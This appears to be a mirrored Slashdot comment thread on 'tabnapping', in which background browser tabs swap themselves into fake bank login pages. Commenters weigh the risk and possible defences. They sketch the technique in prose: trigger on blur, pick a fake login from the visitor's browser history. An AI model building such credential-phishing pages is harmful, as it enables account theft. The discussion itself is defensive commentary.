Slashdot Mirror
Tabnapping Scams Around the Corner?
scamdetect pointed us to an interesting bit of news about a new security risk called tabnapping that was recently outlined by Aza Raskin. The short story is that background tabs are updated with login forms impersonating the sites they originally contained, but hosted by helpful third parties primarily interested in your password. (CT:Original writeup removed at request of submitter)
Obviously, this won't subvert SSL certs or anything; but studies consistently demonstrate that users oscillate between "don't know" and "don't care" about those, so that isn't much comfort.
And, since pages reloading themselves, or even forwarding to a different domain and URL entirely, after a delay is fairly common(if generally annoying) in a wide variety of legitimate applications, you can't really just break the ability to do that. Sure, you could add it as an advanced option somewhere, or get it largely for free with the right NoScript settings; but there is no way you can break it by default.
You pretty much just fall back on the phishing filter, which is a lame, AV-esque "solution". This would seem to apply to all tabbed browsers, as well.
Maybe it is time for the browsers to take matters more seriously and block any scripts from running in tabs that are not currently in focus.
But this can be done in separate windows too, not just in tabs. In terms of whether this is a new concept, let's just say that I have 'seen' this done 10 years ago to gain access to some chat accounts.
You can't handle the truth.
P.T. Barnum, expert applied scamologist, is said to have observed that you can "fool some of the people all of the time and all of the people some of the time."
Arguably, that will be the case here. Your basic clueless noobtard will click on just about anything that looks vaguely plausible, and a lot of stuff that doesn't. This technique will be overkill for them, since straight phishing still works just fine.
Your competent power user, on the other hand, may not fall for the trivial cases(two or three tabs, "innocuous-linkfarm.typosquatter.com" changes into "evil.ath.cx/yourbankherereallyhonestly.html" in front of your eyes); but they are the ones most likely to have 10 firefox windows open, each with 20 or 30 tabs, possibly on multiple monitors. Unless you possess an inhuman ability to maintain state tables in your head, you could easily assume that "yourbank.scam.com" on browser window 5, tab 15, is the "yourbank.com" that you actually did open, on browser window 7, tab 19. That'd be totally understandable mistake, some percentage of the time, especially if you were tired, distracted, multitasking, or getting sauced enough to face a legacy refactoring project.
Again, tab-related trickery is of no particular use against SSL and cert validation, so the clueful user could detect it that way(unless combined with some attack on SSL, the browser's implementation of it, or the integrity of a trusted certificate authority); but there is no particular reason to suspect that any but the most paranoid user would detect the tab-substitution attack itself.
You see this, and think "Why didn't someone think about this before?"
Tab Mix Plus has had locked tabs for a while now. I'm not entirely sure if this fixes the issue of tabnapping, but it looks like it might.
"Our country is not nearly so overrun with the bigoted as it is overrun with the broadminded." -Archbishop Fulton Sheen
So his "exploit" is to wait until you are away from HIS tab and then alter HIS tab to look like it is a different site.
Exactly ... but if the 'fake' site checks your browser history for the specific fake login screens they have in their repertoire then they can show one that you have used recently.
Even if the scripts are completely disabled on the page, what about a delayed HTTP response, in effect a push to the browser by a server that is done sometime after the page is loaded as a delayed response to the browser request?
It's really hard to avoid all possible scenarios on how a page can be changed from something to something else.
You can't handle the truth.
I bank with HSBC, which is by no means a little no-name bank, and they let me log in with just typed credentials (account details and three digits of a 6-9 digit pin). I wish they'd back this up with some kind of dongle authentication, like other banks, but their answer is to have me install some rubbish plugin if I want added security, which I can't always do if I'm using different machines, working off site, etc. so I have little choice (other than the hassle of changing banks) than to accept their requirements. I have taken to using the on-screen keyboard so that I can enter with mouseclicks rather than keypresses if I'm on an untrusted machine, but other than that I can't do much else.
It seems to me that online security is being loosened rather than tightened, in the name of providing more freedom to users (in other words just not making them jump through a couple more hoops to protect their life savings) - simple text entry, banking on mobile phones, isn't all this just asking for trouble? Ten years ago I could create one-time debit/credit card accounts with a fixed maximum or that expired after X payments or that could only be charged by client Y, etc and yet I have a hard time finding any of that from the major banks today.
user actually changed tab?
window.onblur()
Being somebody who got 20-30 tabs up and running along with massive tab switching I can't see how i would not spot that its forcefully reloaded and wrong?
Do you know for certain, without looking, what is in tab #8 right this instant? If you had to look, then if you didn't read the exact URL you just lost. If you didn't have to look or you looked at the URL instead of just the title or the icon on the tab, then you would realize that tab #8 was wrong and you would be immune.
I think the majority of people would fall for it, even if they only had three or four tabs open instead of 20-30.
If I have been able to see further than others, it is because I bought a pair of binoculars.